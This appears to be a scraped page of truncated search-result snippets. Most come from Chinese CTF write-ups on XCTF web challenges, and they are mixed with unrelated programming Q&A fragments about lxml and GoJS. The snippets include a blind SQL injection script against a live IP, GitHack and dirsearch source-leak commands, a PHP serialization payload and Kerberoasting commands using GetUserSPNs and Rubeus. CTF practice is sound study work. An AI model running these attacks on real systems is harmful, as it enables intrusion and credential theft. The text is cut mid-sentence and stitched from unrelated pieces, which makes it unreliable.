ailx10:xctf-unseping(代码审计,反序列化,字符绕过) ailx10:xctf-Web_python_template_injection(模版注入) ailx10:xctf-php_rce(think php 5,代码执行) ailx10:xctf-supersqli(SQL注入) ailx10:xctf-ics-05(文件包含,PHP伪协议,preg_replace) ailx10:xctf-easytornado(模版注入,Tornado) ailx10:xctf-...
http://220.249.52.133:35356/file?filename=/flag.txt&filehash=ae495bad95220a5138f3437fb9919a29 flag in /fllllllllllllag http://220.249.52.133:35356/file?filename=/welcome.txt&filehash=fb6b0556a8bc3be3fb3f104693632b1d /welcome.txt render http://220.249.52.133:35356/file?filename=/hints....
I am trying to take an xml document parsed with lxml objectify in python and add subelements to it. The problem is that I can't work out how to do this. The only real option I've found is a complete r...gojs - adding port controllers I have a node template in go.js with a ...
python 代码语言:js AI代码解释 #!/usr/bin/env python# encoding:utf-8importrequests flag=""url="http://47.104.1.173:20004/findpwd.php"foriinrange(1,1000):forjinrange(33,127):data={#"username":"admin' or ascii(substr((select SCHEMA_NAME from information_schema.SCHEMATA limit 3,1),%s,...
python2 GitHack.py http://111.198.29.45:36544/.git/ 1. 得到源码,发现并没有flag 查看index.php发现 并没有对GET进去的参数进行过滤,assert函数中参数为表达式可以当作PHP文件来执行,再了解一下以下这两个函数: ...
<?phpclassxctf{public$flag='111';publicfunction__wakeup(){exit('bad requests'); } }$content=newxctf();echoserialize($content);?> 结果如下: O:4:"xctf":1:{s:4:"flag";s:3:"111";} 实验截图: 2.相关姿势点 2.1 PHP 常用命令行 ...
python3 dirsearch.py -u http://111.200.241.244:55595/ 通过目录扫描可以看出来存在有Git源码泄露 获取源码 使用...猜你喜欢逆向 早上上班前,做点个人爱好,目前正在反写出这个软件的接口,剩下的只是苦力工而已。 === 2017-06-23 08:02 更新 === 进展不错,已经把一些 Inline 编译的代码还原和对应上了,...
最终答案为:ALEXCTF{SMALL_PRIMES_ARE_BAD} 0x02_6. 总体代码 代码整理如下: fromCrypto.PublicKeyimportRSA frombase64importb64decode fromgmpy2importinvert importrsa withopen('pic/key.pub','rb')asfile: f=file.read() pub=RSA.importKey(f) ...
python GetUserSPNs.py <DomainName>/<DomainUser>:<Password> -outputfile <FileName> Rubeus: #Kerberoasting and outputing on a file with a spesific format Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> #Kerberoasting whle being "OPSEC" safe, essentially while not try to roast...
首先开始没什么信息提示,尝试了下robots.txt发现/.git/被ban了。那么这里就要用到githack将.git泄露源码下载下来。这里还是建议直接下载在虚拟机里的kali上吧。因为githack是python2写的,自己win10系统上装的3。基于python2今年之后就不再更新,还是老老实实在虚拟机里用现成的2吧。